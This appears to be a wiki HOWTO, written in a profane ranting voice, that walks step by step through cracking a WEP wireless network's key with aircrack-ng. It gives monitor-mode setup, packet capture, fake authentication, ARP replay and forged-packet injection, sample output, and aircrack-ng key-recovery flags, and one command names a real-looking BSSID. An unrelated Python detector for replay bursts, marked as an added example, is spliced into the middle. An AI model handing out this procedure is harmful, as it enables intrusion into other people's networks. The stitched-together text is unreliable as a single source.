Revision 7 as of 2018-09-14 10:16:02
WEP Cracking HOWTO
by asbesto && lechuck
I wrote this HOWTO because I was sick and tired of all that online shit. Every fuckin' document that claims to explain how to crack a fracking WEP network really doesn't explain a SINGLE FUCK: it links to other manual pages, gives useless and unexplained examples, and links to other incomplete help pages. So you know what? FUCK YOU: if you wrote a piece of SHIT called HOWTO and you link to help pages, well, that's not a HOWTO, THAT'S A FUCKING STEAMING PILE OF BLOODY SHIT.
Thanks to Lechuck, without him this work would never have been possible.
So, this is a HOWTO: if you follow this document STEP BY STEP, you GET RESULTS, NOW.
What to install
Obviously you need the aircrack suite, now called aircrack-ng only because the old aircrack is no longer developed. WHAT - THE - FUCK. I don't get why in THE HELL the fucking developers renamed it instead of GIVING AN ACTUAL FUCK and calling the new project exactly what the old one was called!
So:
sudo apt-get install aircrack-ng
Set up your network card
Assuming that your wifi card is wlan0, just run
airmon-ng start wlan0 1
so you have just activated the mon0 interface. Sometimes you will get warning messages about daemons interfering and creating problems, shit like avahi, networkmanager, and other useless shit. KILL THEM ALL. You don't need to re-run airmon-ng.
Facts
Assuming the WEP AP to crack is called Diolink-22334455 with MAC address (BSSID) AP:AP:AP:AP:AP:AP
and my wlan0 address is IO:IO:IO:IO:IO:IO.
FIRST: let's dump some data
airodump-ng -c 1 -b AP:AP:AP:AP:AP:AP -t wep -w output.cap mon0
SECOND: aireplay #1
Open another shell:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
You will get something like
16:55:37 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1
16:55:37 Sending Authentication Request (Open System)
16:55:37 Authentication successful
16:55:37 Sending Association Request
16:55:37 Association successful :-) (AID: 1)
root@lem:~#
FUCKING GOOD, it means you can authenticate. Now launch
aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
You get something like
16:57:27 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1
Saving ARP requests in replay_arp-0629-165727.cap
You should also start airodump-ng to capture replies.
Read 1427 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
The packet number begins to rise. 0 ARP is BAD, so let's move on to the third phase.
THIRD: another aireplay
Open a third shell; there we try to authenticate again while the other 2 shells keep running:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
If this creates some ARPs, well, that's GREAT! If it creates only ACKs, they're not useful, so fuck them all. Again on the third shell, we can try
aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
This is aireplay's interactive mode: it forges packets to DO SHIT. In theory, you must say Y to the forged packet only if its length is 68 or 86. It reads the packets, reflects, does some magic and creates.
68 = length of a wifi client ARP. 86 for wired.
BUT I DON'T GIVE A FUCK, it gave me a 76, and I SAY FUCK YES!
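As an added example (not part of the original HOWTO), here is where the 68 and 86 byte sizes above come from, and a defender-side check that spots the broadcast ARP replay burst an aireplay-ng -3 run leaves in a monitor-mode capture. The frame records, the BROADCAST constant and the window/threshold values are constructed assumptions.

```python
from collections import Counter

# A WEP data frame on the air: 802.11 header (24) + IV/key index (4)
# + LLC/SNAP (8) + encrypted payload + ICV (4). WEP hides the bytes
# but not the length, which is why ARP is recognisable by size alone.
DOT11_HDR, WEP_IV, LLC_SNAP, WEP_ICV = 24, 4, 8, 4
ARP_LEN = 28           # ARP request/reply (Ethernet + IPv4)
ETH_MIN_PAYLOAD = 46   # wired hosts pad short frames to the Ethernet minimum
BROADCAST = "ff:ff:ff:ff:ff:ff"   # assumed lower-case MAC formatting

def wep_frame_len(payload_len):
    """On-air length of a WEP data frame carrying payload_len bytes."""
    return DOT11_HDR + WEP_IV + LLC_SNAP + payload_len + WEP_ICV

ARP_WIRELESS = wep_frame_len(ARP_LEN)         # 68: ARP from a wifi client
ARP_WIRED = wep_frame_len(ETH_MIN_PAYLOAD)    # 86: ARP bridged from a wired host

def looks_like_arp(frame_len):
    return frame_len in (ARP_WIRELESS, ARP_WIRED)

def replay_bursts(frames, window=1.0, threshold=100):
    """frames: (timestamp, length, dst_mac, iv_hex) tuples as a monitor-mode
    sniffer would record them. Returns the one-second windows holding more
    than `threshold` broadcast ARP-sized frames, and the IVs seen more than
    once. A replayed frame is the original ciphertext, so it keeps its IV:
    one IV repeated hundreds of times per second is injection, not traffic."""
    per_window, per_iv = Counter(), Counter()
    for ts, length, dst, iv in frames:
        if dst == BROADCAST and looks_like_arp(length):
            per_window[int(ts // window)] += 1
            per_iv[iv] += 1
    suspect = sorted(w for w, n in per_window.items() if n > threshold)
    reused = sorted(iv for iv, n in per_iv.items() if n > 1)
    return suspect, reused

def make_sample():
    """Constructed traffic: three normal frames, then 500 copies of the
    first ARP replayed within one second (what aireplay-ng -3 looks like)."""
    normal = [(0.5, 68, BROADCAST, "3a1b2c"), (1.2, 86, BROADCAST, "9f00e1"),
              (2.0, 110, "02:aa:bb:cc:dd:ee", "113355")]
    burst = [(3.0 + i * 0.002, 68, BROADCAST, "3a1b2c") for i in range(500)]
    return normal + burst

if __name__ == "__main__":
    windows, ivs = replay_bursts(make_sample())
    print("suspect windows:", windows, "reused IVs:", ivs)
```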
After a while, I try
aircrack-ng filename.dump
And here they are, 76000 IVs!!!!! LET'S START THE CRACKING PARTY!
It's pumping away! It sees the file still growing; when a "failed" comes out, it simply restarts...
IT'S DONE. JUST A MATTER OF TIME.
THE BIG DEAL
aircrack-ng -K -M 4981430 -f 3 -b 00:25:53:1A:AB:B4 -s output.cap-01.cap
-s shows the key in ASCII. -K is useful; playing with -f you can crack it 100%.
With -f 4 I found the key.
-b must be specified; if not, BAD SHIT HAPPENS.
Scratchpad
aircrack-ng -K file.dump or file.ivs
-k is a cracking algorithm: -k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
-y This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs.
-z Uses the PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) attack.
In some cases (AKA al**ce adsl :) you want to use -z (sometimes you can't crack it even with >1 million IVs; that's because the default algorithm fails). [lobo]